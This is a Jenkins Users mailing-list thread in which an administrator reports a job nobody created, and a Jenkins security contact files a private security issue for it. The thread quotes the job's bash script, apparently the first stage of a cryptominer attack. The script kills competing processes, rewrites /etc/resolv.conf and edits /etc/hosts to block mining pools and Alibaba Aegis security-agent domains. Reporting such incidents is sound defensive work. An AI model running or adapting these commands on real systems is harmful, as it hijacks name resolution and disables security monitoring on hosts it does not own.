We have locked down the system and have not had a recurrence. If there is one, I will report it ASAP.
Thank you all for the concern :) Cheers, Randall On Wednesday, 1 July 2020 09:55:06 UTC-4, Jan Monterrubio wrote: > > Randall/Daniel, if there does end up being malware for this release would > you mind replying on this thread? > > On Monday, June 22, 2020 at 1:00:09 PM UTC-5, Daniel Beck wrote: >> >> Thanks for your report. >> >> I filed an issue on your behalf in the Jenkins project's private security >> issue tracker. You should have gotten an email notification from Jira about >> it. Please provide more information there to help us investigate. >> >> >> > On 22. Jun 2020, at 19:15, Randall Becker <[email protected]> wrote: >> > >> > Hi All, >> > >> > We just installed Jenkins 2.240 and suddenly there is a job with some >> really strange content, including: >> > >> > #!/bin/bash >> > >> > threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | >> head -n 1); >> > hostHash=$(hostname -f | md5sum | cut -c1-8); >> > echo "${hostHash} - ${threadCount}"; >> > ktr () { >> > killall trace;pkill -9 -f trace;killall -s SIGKILL trace >> > killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix >> > killall viunix;pkill viunix;killall -s SIGKILL viunix >> > kill -9 $(ps -ux | grep trace | awk '{ print $2 }') >> > kill -9 $(ps -ux | grep vunix | awk '{ print $2 }') >> > kill -9 $(ps -ux | grep viunix | awk '{ print $2 }') >> > echo kill >> > } >> > >> > ktr >> > ktr >> > ktr >> > echo plsfoodforcatsnlove >> > echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf >> > echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 >> 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 >> jsrv.aegis.aliyun.com" >> /etc/hosts >> > echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo >> "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> >> /etc/hosts >> > echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 >> pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> >> /etc/hosts >> > echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts; >> > echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts >> > echo "0.0.0.0 minexmr.com" >> /etc/hosts >> > >> > This is really creepy because this script cannot possibly run on our >> system (the good part). The bad part is that no one in our organization >> created this job. Is it possible that there is some malware floating >> around? Our Jenkins instance is hiding behind a firewall so there's no way >> in. >> > >> > Thanks, >> > Randall >> > >> > -- >> > You received this message because you are subscribed to the Google >> Groups "Jenkins Users" group. >> > To unsubscribe from this group and stop receiving emails from it, send >> an email to [email protected]. >> > To view this discussion on the web visit >> https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com. >> >> >> >> -- You received this message because you are subscribed to the Google Groups "Jenkins Users" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/ee855a10-2327-40b5-95e2-8699bfc2f5d1o%40googlegroups.com.
